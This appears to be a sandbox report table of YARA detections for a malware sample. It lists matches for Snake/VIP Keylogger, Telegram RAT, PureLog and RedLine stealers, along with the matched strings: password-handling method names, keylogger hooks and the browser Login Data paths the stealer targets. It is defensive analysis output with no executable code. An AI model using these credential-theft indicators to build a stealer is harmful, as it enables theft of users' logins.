7.2.nhpoymuP.pif.27a00000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.27a00000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.27a00000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.27a00000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.27a00000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.2.nhpoymuP.pif.27a00000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.27a00000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.3.nhpoymuP.pif.2d7ca218.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.3.nhpoymuP.pif.2d7ca218.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
7.2.nhpoymuP.pif.2750a8c6.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.306ae390.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.275099de.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.275099de.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.275099de.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.275099de.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.275099de.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
7.2.nhpoymuP.pif.275099de.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.323b0000.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.2.nhpoymuP.pif.323b0000.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
7.2.nhpoymuP.pif.2750a8c6.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.nhpoymuP.pif.306ae390.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
0.2.image.exe.21e00948.11.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0xafb40:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x92b10:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x93190:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0xb181a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0xb1460:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0xb0918:$s6: constructor or from DllMain.
0.2.image.exe.24066a8.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.2f34a8c6.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.275099de.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
3.2.nhpoymuP.pif.323b0000.8.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.nhpoymuP.pif.30655570.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
14.2.nhpoymuP.pif.284d0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.284d0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.284d0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.30655570.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.30655570.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
3.2.nhpoymuP.pif.2f34a8c6.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.nhpoymuP.pif.2f34a8c6.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
14.2.nhpoymuP.pif.284d0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
14.2.nhpoymuP.pif.284d0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.284d0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
7.2.nhpoymuP.pif.27840ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.27840ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.2.nhpoymuP.pif.27840ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.27840ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
7.3.nhpoymuP.pif.25817960.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.nhpoymuP.pif.25817960.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.3.nhpoymuP.pif.25817960.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.nhpoymuP.pif.25817960.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.nhpoymuP.pif.28470ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.nhpoymuP.pif.25817960.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
14.2.nhpoymuP.pif.28470ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.3.nhpoymuP.pif.25817960.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
14.2.nhpoymuP.pif.28470ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
7.3.nhpoymuP.pif.25817960.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
14.2.nhpoymuP.pif.28470ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.nhpoymuP.pif.306ae390.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.306ae390.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.306ae390.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.306ae390.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.306ae390.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.306ae390.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.2.nhpoymuP.pif.306ae390.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.306ae390.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.nhpoymuP.pif.30656458.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.30656458.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.30656458.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.30656458.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.30656458.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.2.nhpoymuP.pif.30656458.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
0.2.image.exe.21e933d8.10.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.nhpoymuP.pif.30656458.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
7.2.nhpoymuP.pif.27a00000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.27a00000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.nhpoymuP.pif.27a00000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.27a00000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.27a00000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.27a00000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
7.2.nhpoymuP.pif.27a00000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.27a00000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
4.2.Pumyophn.PIF.215835b8.5.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.nhpoymuP.pif.275099de.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.275099de.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.nhpoymuP.pif.275099de.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.275099de.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.275099de.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.323b0000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.323b0000.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.323b0000.8.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.323b0000.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.323b0000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.275099de.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
3.2.nhpoymuP.pif.31c30000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.31c30000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
